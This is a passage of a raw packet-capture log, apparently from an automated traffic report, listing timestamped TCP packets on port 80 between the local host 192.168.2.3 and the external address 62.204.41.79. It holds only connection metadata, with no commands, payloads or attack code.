                                              Dec 13, 2022 20:09:16.129717112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.129838943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.130143881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.130331993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.130477905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.130708933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.130949020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131373882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131448030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131474018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131571054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131658077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131756067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.131964922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132163048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132188082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132497072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132529974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132550955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132638931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132886887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.132915020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.133030891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.133264065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.133294106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.147180080 CET4974280192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.147334099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.147422075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.147546053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.147592068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.147778988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.147866964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148103952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148268938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148431063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148571968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148669958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148808002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.148951054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.149080038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.149188042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.149317980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.149573088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.149696112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.149940968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.150070906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.150070906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.150208950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.150388956 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.150899887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151014090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151103973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151197910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151312113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151532888 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151724100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151863098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.151995897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.152127028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.152250051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.152364016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.152518988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.160541058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.160645008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.160757065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.160849094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.160937071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161026001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161113024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161205053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161288977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161405087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161531925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161659002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161783934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.161906004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162158012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162158012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162307024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162431955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162566900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162700891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.162830114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.163017035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.163152933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.164963961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.165180922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.165272951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.165734053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.165967941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.166079044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.166253090 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.166354895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.166872025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.167000055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.167167902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.167320967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.167459965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.167753935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.167978048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.168221951 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.168318987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.168715000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.168806076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.168931961 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169028997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169121027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169400930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169672966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169672966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169768095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169856071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.169944048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.170068979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.170121908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.176791906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.176834106 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.176904917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.177572012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.178199053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.178222895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.178436041 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.178508043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.178613901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.178700924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.178788900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.178986073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179076910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179177046 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179263115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179389000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179446936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179542065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179632902 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179728985 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179821014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.179918051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180006981 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180104017 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180192947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180289030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180377960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180475950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180567980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180660963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180749893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180845976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.180936098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.181035042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.181253910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.181253910 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.181404114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.181507111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.181698084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.182073116 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.182226896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.182492971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.182615042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.182713032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.182801008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.207905054 CET804974262.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.207945108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208008051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208112955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208134890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208241940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208359003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208590984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208724022 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.208862066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.209096909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.209117889 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.209240913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.209598064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.209626913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.209830046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210103989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210139036 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210433006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210506916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210582972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210666895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.210800886 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.211376905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.211460114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.211539984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.211659908 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.211735964 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.211993933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212183952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212305069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212650061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212676048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212693930 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212785006 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.212943077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.213334084 CET804974262.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.215547085 CET4974280192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.221434116 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221491098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221508980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221549034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221596003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221667051 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221831083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221890926 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.221990108 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222137928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222266912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222342968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222609997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222670078 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222764969 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.222919941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.223027945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.223232985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.223304987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.223535061 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.223586082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.225625992 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.225653887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.225709915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.226248980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.226711988 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.226741076 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.226759911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.226908922 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.227447033 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.227478027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.227653027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.227708101 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.227926016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.228260040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.228569984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.228789091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.228876114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.229248047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.229366064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.229391098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.229466915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.229626894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.229911089 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.230256081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.230304003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.230324030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.230386019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.230578899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.230597019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.231080055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231265068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231389999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231515884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231637001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231758118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231878996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.231997967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232119083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232234955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232352972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232471943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232590914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232707024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.232825994 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.239200115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239237070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239259005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239329100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239535093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239561081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239639044 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239712954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239837885 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239917040 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.239994049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.240098953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.240242958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.240864038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.240899086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.240925074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.240948915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241080999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241108894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241281986 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241307974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241485119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241513014 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241535902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241719961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241746902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241967916 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.241991997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.242214918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.242575884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.242674112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.242984056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.243124962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.243170977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.243217945 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:16.255577087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.255713940 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.255872011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.255996943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256124973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256249905 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256376028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256500006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256627083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256756067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.256886005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257090092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257287025 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257431030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257569075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257697105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257834911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.257960081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258090973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258208036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258339882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258455038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258591890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258744955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.258898020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259011030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259144068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259263992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259396076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259524107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259651899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259782076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.259902954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.260107040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.260229111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.260477066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.260624886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.260778904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.260940075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261070967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261274099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261317015 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261445045 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261569023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261696100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261828899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.261944056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.262073040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.262221098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.262370110 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.267370939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.267566919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.267692089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.267812967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.267944098 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.268062115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.268179893 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.268296957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:16.268415928 CET4973680192.168.2.362.204.41.79
